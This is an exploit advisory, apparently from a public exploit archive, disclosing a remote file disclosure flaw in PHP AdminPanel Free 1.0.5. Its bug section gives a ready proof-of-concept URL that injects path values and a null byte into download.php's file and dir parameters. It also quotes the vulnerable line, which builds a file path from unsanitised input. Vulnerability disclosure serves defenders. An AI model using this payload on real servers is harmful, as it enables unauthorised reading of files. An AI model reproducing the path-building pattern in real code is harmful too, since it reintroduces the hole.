PHP AdminPanel Free version 1.0.5 suffers from a remote file disclosure vulnerability.
e3bd228aab1eb6452ca95978d3df45a1e1209ea6568c060413b9dbd2fffe38e9
#####################################################################################
#### Php AdminPanel Free version 1.0.5 Remote File Disclosure ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : https://ircrash.com #
#My Official WebSite : https://r3dw0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Download : https://www.apphp.com #
# #
#Dork : :( #
# #
#####################################################################################
# [Bug] #
# #
#https://[target]/[adminpanel_path]/modules/datagrid/scripts/download.php?file=export0000&dir=file.type%00
# #
#Note : #
#Plz see this code : #
# ..... #
# $file_path = "../../".$dir.$file; #
# ..... #
#In download.php set file path 2 dir ups. #
###################################### TNX GOD ######################################